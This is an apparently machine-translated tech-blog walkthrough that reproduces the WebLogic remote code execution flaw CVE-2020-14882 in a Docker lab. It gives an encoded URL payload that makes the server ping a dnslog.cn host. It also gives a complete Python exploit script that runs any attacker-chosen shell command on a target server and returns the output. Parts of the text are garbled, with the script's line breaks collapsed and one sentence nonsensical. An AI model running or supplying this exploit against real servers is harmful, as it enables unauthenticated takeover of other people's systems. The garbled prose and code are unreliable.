Shulou(Shulou.com)05/31 Report--

This article introduces how weblogic unauthorized command execution vulnerability CVE-2020-14882 is, the content is very detailed, interested partners can refer to it, I hope it can help you.

An unauthenticated remote attacker could exploit this vulnerability to execute arbitrary code on an affected WebLogic Server by constructing a specially crafted HTTP GET request.

The environment built with docker../ vulhub/weblogic/CVE-2020-14882

Visit login interface 192.168.81.129:7001/console/login/LoginForm.jsp

3.pyloadyes/console/images/%252E%252E%252Fconsole.portal?_ nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27ping 0cs5r3.dnslog.cn%27);%22);

I also got it according to the articles published by the big guys on the Internet, but it was not recorded in dnslog. Finally, I entered the ping command in the docker container and found that I could not ping in docker.

Since you can't ping, then use python to reproduce (fortunately, you know something about python, otherwise you will hit the wall)

#!/ usr/bin/python3import requestsimport sysimport http.clienthttp.client.HTTPConnection._ http_vsn = 10http.client.HTTPConnection._ http_vsn_str = 'HTTP/1.0'if len(sys.argv) != 3:print("[+] Usage : python3 exploit.py http(s)://target:7001 command")exit()target = sys.argv[1]command = sys.argv[2]request = requests.session()headers_cmd = {'User-Agent': 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0','cmd': command,'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8','Content-Type': 'application/x-www-form-urlencoded'}cmd="""/console/css/%25%32%65%25%32%65%25%32%66consolejndi.portal? test_handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod("getServletRequest").invoke(obj); String cmd = req.getHeader("cmd");String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd};if(cmd != null ){ String result = new java.util.Scanner(new java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter("%5C%5CA").next(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod("getResponse").invoke(req);res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush();} currentThread.interrupt();')"""url_cmd = target+cmdresponse = request.get(url_cmd, headers=headers_cmd, verify=False)print(response.text)print("[+] Attack complete! ")

If you don't want to be able to do this, you can do it with a simple, simple, and simple method.

About weblogic unauthorized command execution vulnerability CVE-2020-14882 is how to share here, I hope the above content can be of some help to everyone, you can learn more knowledge. If you think the article is good, you can share it so that more people can see it.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.